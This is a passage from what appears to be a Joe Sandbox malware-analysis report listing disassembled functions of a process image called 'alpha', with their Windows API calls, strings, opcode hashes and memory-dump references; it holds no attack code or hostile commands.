                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAACF
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAAEC
                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB39
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB6F
                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABA4
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue$CreateOpen
                                                      • String ID: %s=%s
                                                      • API String ID: 1019019434-1087296587
                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction ID: eeaca4c8d1d37fa740226598ca499e0b83d55dd0b0ec19b041cae7c1b70f8bb8
                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction Fuzzy Hash: AF51A531B0875296E760EB25A8467BAF7A1FB89791F81C236CA4D83790DFBCD442C711
                                                      Function 00007FF7E1DB1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpwcsrchr
                                                      • String ID: COPYCMD
                                                      • API String ID: 2429825313-3727491224
                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                      • Instruction ID: e0d8cba298e07220c052894557b691163a1a4570f1a78a78668a82462d9fb5f6
                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                      • Instruction Fuzzy Hash: 23F1B522F0864695FB60EF51A0427BDB3A1EB44798F804637CE5E136C4DFBCA555C362
                                                      Function 00007FF7E1DB4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$FullNamePathwcsrchr
                                                      • String ID:
                                                      • API String ID: 4289998964-0
                                                      • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction ID: 46ebeda9c88c80cf5cf1044ef5107596b48eb29a0c16b1f0f72b54442335a940
                                                      • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction Fuzzy Hash: 14C1C311E0935692EFA4FB51954A779A3A0FB45B90F815632CE0E077D0DFBCA491C362
                                                      Function 00007FF7E1DDBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                      • String ID:
                                                      • API String ID: 3476366620-0
                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                      • Instruction ID: 61091c97fbdea65749aa98a672f36d78fa8e0f68fef7e65103d4cb73476a8846
                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                      • Instruction Fuzzy Hash: 9521EE20D08A4296EB18FB1494173B8EA50FF4A71AFC49277D55F422E1DFBCA444C663
                                                      Function 00007FF7E1DB3D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                      • String ID: %9d
                                                      • API String ID: 1006866328-2241623522
                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                      • Instruction ID: 47b18b95349bf7fb8436eb1feeca6d974d13b02191ef1ec6cc10948366a1c51f
                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                      • Instruction Fuzzy Hash: 8C51D5B2A087429AF700EF10D8427A9B7A0FB08754F814636DA6D53795CFBCE554CB61
                                                      Function 00007FF7E1DB8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction ID: 931aa7ff86b1b35f3231b549eb772980d6f29d3d8ec5840036c79809ba846e1b
                                                      • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction Fuzzy Hash: F9C1F562E0978296EB64EB20E852BF9A3A0FB94784F844536DA0F07794DFBCE551C311
                                                      Function 00007FF7E1DB9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                      • Instruction ID: 8225d8928d15e572c5f685a649d042fab9f4bf782d230395d95721dcc981bf9d
                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                      • Instruction Fuzzy Hash: 28A1C461A0968291EB14EB25A453BBAB6E0FF88780FD14137DD4F43795DEBCE811C722
                                                      Function 00007FF7E1DDFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DiskFreeSpace
                                                      • String ID: %5lu
                                                      • API String ID: 2448137811-2100233843
                                                      • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                      • Instruction ID: 13569d7258be1140b1aa18b86f8d2f5a68dc31aefba02b4bcbbdbd1389165d2d
                                                      • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                      • Instruction Fuzzy Hash: D8418F22B08AC195EB65EF55E8417EAB360FB84789F808136EA4D4BB48DFBCD149C711
                                                      Function 00007FF7E1DBD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 2081463915-1994581435
                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction ID: cec4c7b3183c80703036b39bd2b6680e02f83b4e6cb631473a830adaf79e0424
                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction Fuzzy Hash: 9D71BC20E08642A5FB64FB24A8867B9A6E0AF05759FC4453BD50F432A5DFFCA4918322
                                                      Function 00007FF7E1DB81D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr
                                                      • String ID:
                                                      • API String ID: 1497570035-0
                                                      • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                      • Instruction ID: 6010ecb5c06d1797ac15fca347a8afbb8386b042ca2328e8d77af8896f9a1b0d
                                                      • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                      • Instruction Fuzzy Hash: 36C14661A0868292EB54FB11A4427B9E7A0FF88780F844537EA4F437D5DFBCE450C722
                                                      Function 00007FF7E1DD7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                      • Instruction ID: 77257c7e2e045a3dbc0e2a7dcff853cce63b901284a409a2ad2f50d5f1b65008
                                                      • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                      • Instruction Fuzzy Hash: 54A10752B1825281EF24FB6994163B9E690AF45BF8FC44336DE6E477C4EEBCE4418321
                                                      Function 00007FF7E1DB6BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • _pipe.MSVCRT ref: 00007FF7E1DB6C1E
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB6CD1
                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7E1DB6CFB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                      • String ID:
                                                      • API String ID: 624391571-0
                                                      • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                      • Instruction ID: ca85e1b4e2c54b7d86cbfabd58114207de8563b560593d4f6ff8c5f96b38b049
                                                      • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                      • Instruction Fuzzy Hash: 4B71D271A08A0296E714FF34D842778F691FF49754F84823ADA5E872D5CFBCE8518722
                                                      Function 00007FF7E1DD63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                      • String ID:
                                                      • API String ID: 4268342597-0
                                                      • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                      • Instruction ID: 1b3605592f1654b132e93aac95c1baa87bb5cd7334e5772a3c104228f89042d5
                                                      • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                      • Instruction Fuzzy Hash: 46815022E0878281EB64EF25A442339B7A1FB55B84F884237D95D83754DFBCE480C7A2
                                                      Function 00007FF7E1DC88C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: OpenToken$CloseProcessThread
                                                      • String ID:
                                                      • API String ID: 2991381754-0
                                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                      • Instruction ID: 111c5bd72b23c5829098dab2dfb3297298cf2c82c97740267226ba76a37bc2c3
                                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                      • Instruction Fuzzy Hash: DD210732B0864287E740EB54D4427BEFB60EB847B1F814236EB4943684DFBCD898CB12
                                                      Function 00007FF7E1DB586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E1DDC59E), ref: 00007FF7E1DB5879
                                                        • Part of subcall function 00007FF7E1DB58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5903
                                                        • Part of subcall function 00007FF7E1DB58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5943
                                                        • Part of subcall function 00007FF7E1DB58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DB5956
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValueVersion
                                                      • String ID: %d.%d.%05d.%d
                                                      • API String ID: 2996790148-3457777122
                                                      • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                      • Instruction ID: f197d266cc9998bd44454ac8a5c2bb2fbe253a80cc5916235325472b5e3adcf6
                                                      • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                      • Instruction Fuzzy Hash: 9BF0A072A0838197D310EF16B44116AEAA1FB88781F908139EA4A07B5ACF7CD554CB50
                                                      Function 00007FF7E1DC7854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
